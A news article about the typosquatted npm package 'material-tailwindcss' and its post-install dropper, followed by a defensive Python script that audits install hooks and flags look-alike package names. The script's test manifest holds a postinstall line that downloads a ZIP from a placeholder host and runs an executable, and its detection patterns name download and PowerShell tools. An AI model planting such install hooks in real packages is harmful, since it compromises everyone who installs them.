A malicious NPM package has been discovered masquerading as a legitimate software library from Material Tailwind. This indicates an attacker’s attempt to distribute malicious code in an open source software repository.
Material Tailwind is a CSS-based framework advertised by its maintainers as “an easy-to-use component library for Tailwind CSS and Material Design”.
Karlo Zanki, a security researcher at ReversingLabs, said in a report published in The Hacker News: “This script is designed to download a password-protected ZIP archive file containing a Windows executable that can run PowerShell scripts.”
The now-removed malicious package named material-tailwindcss has so far been downloaded 320 times, all since September 15, 2022.
In an increasingly common technique, attackers covertly use post-installation scripts to introduce malicious functionality, taking care to mimic the functionality provided by the original package.
The payload takes the form of a ZIP file retrieved from a remote server, with an embedded Windows binary named “DiagnosticsHub.exe”, likely an attempt to pass the payload off as a diagnostic utility.
[Figure: Code for stage 2 download]
Packed within the executable are PowerShell code snippets responsible for command-and-control communication, process manipulation, and establishing persistence through scheduled tasks.
The typosquatted Material Tailwind module is the latest in a long list of attacks targeting open source software repositories such as npm, PyPI, and RubyGems in recent years.
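Two of the defensive checks the passages above suggest are (1) auditing a package manifest for install-time lifecycle scripts that fetch remote archives or launch Windows executables, and (2) comparing a dependency name against the packages you actually intended to install. The script below is an added example written for this article; it is not code from ReversingLabs, npm, or the Material Tailwind project. The two package.json manifests, the list of "known" package names, and the regular-expression heuristics are all constructed for illustration and are assumptions, not a complete detection rule set.

```python
import json
import re

# Lifecycle hooks that npm runs automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed heuristics: behaviours that are unusual for a CSS component
# library to need at install time. Adjust to your own environment.
SUSPICIOUS_PATTERNS = {
    "remote_download": re.compile(
        r"\b(curl|wget|Invoke-WebRequest|iwr)\b|https?://", re.I),
    "archive_extract": re.compile(
        r"\b(unzip|Expand-Archive|7z|tar)\b|\.zip\b", re.I),
    "windows_exec": re.compile(
        r"\.exe\b|\bpowershell\b|\bcmd(\.exe)?\s*/c\b", re.I),
    "inline_eval": re.compile(
        r"node\s+-e\s|eval\(|Buffer\.from\([^)]*base64", re.I),
}


def audit_install_scripts(package_json_text):
    """Return a list of findings for install-time scripts in a package.json."""
    manifest = json.loads(package_json_text)
    scripts = manifest.get("scripts") or {}
    findings = []
    for hook in INSTALL_HOOKS:
        command = scripts.get(hook)
        if not command:
            continue
        hits = [name for name, pattern in SUSPICIOUS_PATTERNS.items()
                if pattern.search(command)]
        if hits:
            findings.append({"hook": hook, "command": command,
                             "indicators": sorted(hits)})
    return findings


def edit_distance(a, b):
    """Levenshtein distance via a rolling single-row dynamic programme."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,            # deletion
                           cur[j - 1] + 1,         # insertion
                           prev[j - 1] + (ca != cb)))  # substitution
        prev = cur
    return prev[-1]


def typosquat_candidates(name, known_names, max_distance=2):
    """Known package names that `name` looks like but is not.

    A name is flagged when a known name is embedded in it (e.g. a suffix
    appended to a real name) or when it sits within a small edit distance.
    An exact match is the genuine package and is never flagged.
    """
    if name in known_names:
        return []
    return sorted(k for k in known_names
                  if k in name or edit_distance(name, k) <= max_distance)


# Constructed sample manifests (hypothetical; not the real packages' files).
BENIGN_MANIFEST = json.dumps({
    "name": "example-ui-kit",
    "version": "1.0.0",
    "scripts": {"postinstall": "node scripts/postinstall-message.js",
                "prepare": "husky install"},
})

SUSPICIOUS_MANIFEST = json.dumps({
    "name": "material-tailwindcss",
    "version": "1.0.0",
    "scripts": {"postinstall": "curl -o dh.zip https://example.invalid/stage2.zip"
                               " && unzip -P placeholder dh.zip"
                               " && DiagnosticsHub.exe"},
})

# Constructed allow-list of names a project expects to depend on.
KNOWN_PACKAGES = ["material-tailwind", "tailwindcss", "react", "lodash", "express"]


if __name__ == "__main__":
    for label, manifest in (("benign", BENIGN_MANIFEST),
                            ("suspicious", SUSPICIOUS_MANIFEST)):
        name = json.loads(manifest)["name"]
        print(label, name, audit_install_scripts(manifest),
              typosquat_candidates(name, KNOWN_PACKAGES))
```

In a CI pipeline the same audit can be run against every manifest under `node_modules` after an install performed with `npm install --ignore-scripts`, so that lifecycle hooks are inspected before they are ever allowed to execute; the name check is a cheap complement to a pinned lockfile, not a replacement for it.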
This attack also highlights the software supply chain as an attack surface, because attackers can create cascading effects by distributing malicious code that wreaks havoc on multiple platforms and enterprise environments at once.
The supply chain threat has prompted the U.S. government to issue a memo directing federal agencies to “use only software that complies with secure software development standards” and to obtain “self-certification of all third-party software”.
The White House said last week, “Ensuring software integrity is critical to protecting federal systems from threats and vulnerabilities and reducing overall risk from cyberattacks.”